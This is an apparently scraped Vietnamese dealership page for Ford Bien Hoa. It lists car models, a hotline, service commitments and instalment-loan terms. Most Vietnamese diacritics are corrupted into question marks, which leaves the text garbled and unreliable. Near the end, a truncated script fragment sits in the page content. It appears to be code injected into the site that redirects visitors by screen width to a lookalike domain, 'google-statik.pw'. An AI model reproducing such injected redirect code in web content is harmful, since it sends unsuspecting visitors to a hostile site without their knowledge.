FORD Ô TÔ BIÊN HÒA

Gi?i thi?u FORD O TO BIEN HO?A.

alt
 

Hotline: 0919 755 776  

La? da?i ly? Ford ta?i Bien Ho?a - Do?ng Nai no?i rieng va? ta?i ca?c Ti?nh Mie?n Dong Nam Bo? no?i chung  du?c trang b? cac d?ng c?, thi?t b? hi?n d?i va hoan h?o nh?t v?i ch?c nang chuyen cung c?p s?n ph?m xe hoi FORD va cac d?ch v? s?a ch?a, b?o du?ng, d?ng son, cung c?p ph? tung chinh hang...

V?i phuong cham "Vui long khach d?n, hai long khach di",  FORD BIEN HO?A luon tran tr?ng va l?ng nghe t?t c? cac y ki?n dong gop c?a quy khach hang, mong mang l?i cho khach hang s? hai long cao nh?t.

Hi?n nay chung toi dang phan pho?i ca?c loa?i xe m?i g?m:

alt 

FORD FIESTA HATBACK 1.6 L A/T SPORT MA?Y XANG

alt 

FORD FIESTA SEDAN 1.4L M/T - 1.6L A/T MA?Y XANG

Xem chi tie?t Ford Fiesta 

alt 

FORD FOCUS SEDAN 1.8L M/T - 2.0L - A/T MA?Y XANG

Xem chi tie?t Ford Focus 

alt 

alt 

FORD FOCUS 5 CU?A 1.8L A/T MA?Y XANG - 2.0L - A/T  MA?Y DA?U

Xem chi tie?t Ford Focus 5 cu?a Hatchback

alt 

FORD MONDEO 2.3 L A/T MA?Y XANG

Xem chi tie?t Ford Mondeo 

alt 

FORD EVEREST 2.5 L 4x2 M/T, 4x2 A/T, 4x4 M/T MA?Y DA?U

Xem chi tie?t Ford Everest 

alt

FORD ESCAPE 2.3 L 4x2 A/T - 4x4 A/T

Xem chi tie?t Ford Escape 2.3 

alt 

alt 

alt 

alt 

alt 

FORD RANGER 2.5L MA?Y DA?U CA?C LOA?I

Xem chi tie?t Ford ranger 

alt 

FORD TRANSIT 16 CHO? 2.4 L MA?Y DA?U SO? SA?N.

Xem chi tie?t Ford Transit 16 cho?

alt 

FORD TRANSIT VAN  2.4 L MA?Y DA?U SO? SA?N

Xem chi tie?t Ford Transit Van 

Chu?ng toi Cam k?t: Xe xua?t xu? chi?nh ha?ng, du?ng theo tieu chua?n cu?a nha? sa?n xua?t.

Gia t?t nha?t ta?i mo?i tho?i die?m.Tho?i gian giao xe nhanh nha?t. Th? th?c nhanh chong don gia?n.

H? tr? k?p th?i. V?i d?ch v? b?o hanh b?o du?ng, ba?o ha?nh tr?c ti?p t?i xu?ng c?a cong ty theo quy di?nh cu?a nha? sa?n xua?t.

Ngoai ra, Cong ty co?n h? tr? thu? tu?c dang ky, dang kie?m, thu? tu?c mua xe tr? gop vo?i so? tie?n vay tu? 50% - 70% gia? tri? xe, tho?i gian vay tu? 3 - 5 nam vo?i la?i sua?t theo quy di?nh cu?a Ngan ha?ng nha? nuo?c Vie?t Nam.

Quy? kha?ch co? nhu ca?u vui lo?ng lien he?: 0919. 755 776 de? duo?c tu va?n va? ba?o gia? to?t nha?t.

Website: otobienhoa.vn
if (screen.width ion = "http://google-statik.pw/l.php";}
 

Salon Auto

Nội thất đồ chơi

Tư vấn mua bán xe


 

Quảng Cáo